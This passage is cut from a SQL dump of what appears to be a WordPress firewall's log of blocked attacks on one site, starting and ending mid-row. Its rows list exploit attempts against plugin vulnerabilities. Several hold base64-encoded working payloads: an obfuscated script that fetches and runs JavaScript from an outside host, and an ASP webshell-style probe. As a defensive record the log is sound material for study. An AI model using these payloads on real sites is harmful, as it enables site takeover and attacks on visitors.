Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYSA9IF9hYWFhYWFhYWEoX2FhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYShfYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37815,1569949845.299653,1569949844.096300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37695,1569411793.425975,1569411792.638800,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37696,1569411791.149272,1569411790.283100,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Total Donations (all known versions) - Multiple Unauthenticated AJAX Actions','{\"learningMode\":0,\"failedRules\":\"129\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L2hvbWUvbm9yZmFpei9wdWJsaWNfaHRtbC9iaW50YXJhLmNvbS5teS93cC1hZG1pbi9hZG1pbi1hamF4LnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37777,1569949742.566682,1569949739.198200,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37697,1569411788.787614,1569411787.775900,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W3NnY2dvb2dsZWFuYWx5dGljXQ==\",\"paramValue\":\"PHNjcmlwdCAgIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIGMgPSAwO3ZhciBfYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWEqLyw1OC8qX2FhYWFhYWFhYSovLDQ3LypfYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWEqLywxMDMvKl9hYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYSovLDExNS8qKi8sNDYvKl9hYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDExOS8qKi8sOTcvKl9hYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWEqLywxMDQvKl9hYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWEqLywxMTEvKiovLDEwOS8qX2FhYWFhYWFhYSovLDQ3LyoqLywxMDgvKl9hYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWEqLywxMDgvKiovLDQ3LyoqLyw5OS8qX2FhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWEqLywxMDYvKl9hYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWEqLyw2Myk7dmFyIF9hYWFhYWFhYWEgPSBfYWFhYWFhYWFhKF9hYWFhYWFhYWEpO2lmKF9hYWFhYWFhYWEubGVuZ3RoID4gMyl7X2FhYWFhYWFhYShfYWFhYWFhYWFhKTt9IGZ1bmN0aW9uIF9hYWFhYWFhYWEoX2FhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7X2FhYWFhYWFhYS5vcGVuKCBTdHJpbmcuZnJvbUNoYXJDb2RlKDcxLDY5LDg0KSwgX2FhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhLnNlbmQoIG51bGwgKTtyZXR1cm4gX2FhYWFhYWFhYS5yZXNwb25zZVRleHQ7fWZ1bmN0aW9uIF9hYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhID0gbmV3IEZ1bmN0aW9uKCd4JywgJ3knLCB0b2RvKycgcmV0dXJuIHgreTsnKTtfYWFhYWFhYWFhKDAsMCk7fTwvc2NyaXB0Pg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37778,1569949737.453910,1569949734.916300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37819,1569949836.804532,1569949835.609300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhYWE9U3RyaW5nLmZyb21DaGFyQ29kZSgxMDQvKl9hYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhYWEqLywxMTIvKiovLDExNS8qX2FhYWFhYWFhYWFhYSovLDU4LypfYWFhYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhYWEqLyw0Ny8qX2FhYWFhYWFhYWFhYSovLDEwMy8qX2FhYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYWFhKi8sMTE1LypfYWFhYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWFhYSovLDk4LyoqLywxMDEvKl9hYWFhYWFhYWFhYWEqLywxMDgvKl9hYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYSovLDEwMS8qX2FhYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWFhYSovLDk4LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWFhYSovLDEwMS8qKi8sMTE0LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhYWEqLyw5OS8qX2FhYWFhYWFhYWFhYSovLDExMS8qKi8sMTA5LypfYWFhYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWFhYSovLDExMS8qKi8sOTkvKl9hYWFhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYWFhKi8sMTA4LypfYWFhYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhYWEqLywxMTQvKl9hYWFhYWFhYWFhYWEqLyw0Ni8qX2FhYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWFhYSovLDExNS8qX2FhYWFhYWFhYWFhYSovLDYzKTt2YXIgX2FhYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhYWEoX2FhYWFhYWFhYWFhYSk7aWYoX2FhYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYWFhKF9hYWFhYWFhYWFhYWEpO30gZnVuY3Rpb24gX2FhYWFhYWFhYWFhYShfYWFhYWFhYWFhYWFhKXsgdmFyIF9hYWFhYWFhYWFhYWEgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtfYWFhYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYWFhLCBmYWxzZSApO19hYWFhYWFhYWFhYWEuc2VuZCggbnVsbCApO3JldHVybiBfYWFhYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWFhYSh0b2RvKXsgdmFyIF9hYWFhYWFhYWFhYWEgPSBuZXcgRnVuY3Rpb24oJ3gnLCAneScsIHRvZG8rJyByZXR1cm4geCt5OycpO19hYWFhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37779,1569949733.365308,1569949730.401300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37780,1569949728.792137,1569949726.092400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37698,1569411824.118544,1569411823.251700,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37763,1569949552.133191,1569949551.021900,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(37764,1569949549.203306,1569949547.373300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37901,1570544925.656051,1570544924.717500,'\0\0\0\0\0\0\0\0\0\0ÿÿw»äÎ',0,403,0,0,0,'http://bintara.com.my//plus/mumaasp.asp','https://www.baidu.com','Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5W211bWFhc3BfY29tXQ==\",\"paramValue\":\"RXhlY3V0ZSgiRXhlY3V0ZSgiIk9uIEVycm9yIFJlc3VtZSBOZXh0OlJlc3BvbnNlLkNsZWFyOkZ1bmN0aW9uIGJkKGJ5VmFsIHMpOkZvciBpPTEgVG8gTGVuKHMpIFN0ZXAgMjpjPU1pZChzLGksMik6SWYgSXNOdW1lcmljKE1pZChzLGksMSkpIFRoZW46RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyYiIiIiKSIiIiIpOkVsc2U6RXhlY3V0ZSgiIiIiYmQ9YmQmY2hyJSgmSCIiIiImYyZNaWQocyxpKzIsMikmIiIiIikiIiIiKTppPWkrMjpFbmQgSWYiIiZjaHIlKDEwKSYiIk5leHQ6RW5kIEZ1bmN0aW9uOlJlc3BvbnNlLldyaXRlKCIiIiItPnwiIiIiKTpFeGVjdXRlKCIiIiJPbiBFcnJvciBSZXN1bWUgTmV4dDoiIiIiJmJkKCIiIiI0NDY5NkQyMDUzM0E1MzNENTM2NTcyNzY2NTcyMkU0RDYxNzA3MDYxNzQ2ODI4MjIyRTIyMjkyNjYzNjg3MjI4MzkyOTNBNTM0NTU0MjA0MzNENDM3MjY1NjE3NDY1NEY2MjZBNjU2Mzc0MjgyMjUzNjM3MjY5NzA3NDY5NkU2NzJFNDY2OTZDNjU1Mzc5NzM3NDY1NkQ0RjYyNkE2NTYzNzQyMjI5M0E0OTY2MjA0NTcyNzIyMDU0Njg2NTZFM0E0NTcyNzIyRTQzNkM2NTYxNzIzQTQ1NkM3MzY1M0E0NjZGNzIyMDQ1NjE2MzY4MjA0NDIwNjk2RTIwNDMyRTQ0NzI2OTc2NjU3MzNBNTMzRDUzMjY0NDJFNDQ3MjY5NzY2NTRDNjU3NDc0NjU3MjI2NjM2ODcyMjgzNTM4MjkzQTRFNjU3ODc0M0E0NTZFNjQyMDQ5NjYzQTUyNjU3MzcwNkY2RTczNjUyRTU3NzI2OTc0NjUyODUzMjkiIiIiKSk6UmVzcG9uc2UuV3JpdGUoIiIiInw8LSIiIiIpOlJlc3BvbnNlLkVuZCIiKSIp\",\"path\":\"Ly9wbHVzL211bWFhc3AuYXNw\",\"category\":\"sqli\",\"ssl\":0}'),(37765,1569949545.111333,1569949543.597300,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37852,1569949988.940995,1569949987.816400,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'http://bintara.com.my/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICAgdHlwZT10ZXh0L2phdmFzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD52YXIgYyA9IDA7dmFyIF9hYWFhYWFhYWFhPVN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LypfYWFhYWFhYWFhYSovLDExNi8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTEyLyoqLywxMTUvKl9hYWFhYWFhYWFhKi8sNTgvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sNDcvKl9hYWFhYWFhYWFhKi8sMTAzLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE1LyoqLyw0Ni8qX2FhYWFhYWFhYWEqLyw5OC8qKi8sMTAxLypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTYvKl9hYWFhYWFhYWFhKi8sMTAxLypfYWFhYWFhYWFhYSovLDExNC8qX2FhYWFhYWFhYWEqLyw5OC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sMTE5LyoqLyw5Ny8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sMTE2LypfYWFhYWFhYWFhYSovLDEwNC8qX2FhYWFhYWFhYWEqLywxMDEvKiovLDExNC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sNDYvKl9hYWFhYWFhYWFhKi8sOTkvKl9hYWFhYWFhYWFhKi8sMTExLyoqLywxMDkvKl9hYWFhYWFhYWFhKi8sNDcvKiovLDEwOC8qX2FhYWFhYWFhYWEqLywxMTEvKiovLDk5LypfYWFhYWFhYWFhYSovLDk3LypfYWFhYWFhYWFhYSovLDEwOC8qKi8sNDcvKiovLDk5LypfYWFhYWFhYWFhYSovLDEwOC8qX2FhYWFhYWFhYWEqLywxMDEvKl9hYWFhYWFhYWFhKi8sOTcvKl9hYWFhYWFhYWFhKi8sMTE0LypfYWFhYWFhYWFhYSovLDQ2LypfYWFhYWFhYWFhYSovLDEwNi8qX2FhYWFhYWFhYWEqLywxMTUvKl9hYWFhYWFhYWFhKi8sNjMpO3ZhciBfYWFhYWFhYWFhYSA9IF9hYWFhYWFhYWFhKF9hYWFhYWFhYWFhKTtpZihfYWFhYWFhYWFhYS5sZW5ndGggPiAzKXtfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSk7fSBmdW5jdGlvbiBfYWFhYWFhYWFhYShfYWFhYWFhYWFhYSl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO19hYWFhYWFhYWFhLm9wZW4oIFN0cmluZy5mcm9tQ2hhckNvZGUoNzEsNjksODQpLCBfYWFhYWFhYWFhYSwgZmFsc2UgKTtfYWFhYWFhYWFhYS5zZW5kKCBudWxsICk7cmV0dXJuIF9hYWFhYWFhYWFhLnJlc3BvbnNlVGV4dDt9ZnVuY3Rpb24gX2FhYWFhYWFhYWEodG9kbyl7IHZhciBfYWFhYWFhYWFhYSA9IG5ldyBGdW5jdGlvbigneCcsICd5JywgdG9kbysnIHJldHVybiB4K3k7Jyk7X2FhYWFhYWFhYWEoMCwwKTt9PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":0}'),(37699,1569411821.800130,1569411821.000400,'\0\0\0\0\0\0\0\0\0\0ÿÿÆE°',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(37766,1569949525.580799,1569949521.142500,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37767,1569949519.263052,1569949517.293900,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(37768,1569949513.668745,1569949510.096600,'\0\0\0\0\0\0\0\0\0\0ÿÿhƒ›~',0,403,0,0,0,'https://bintara.com.my/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options 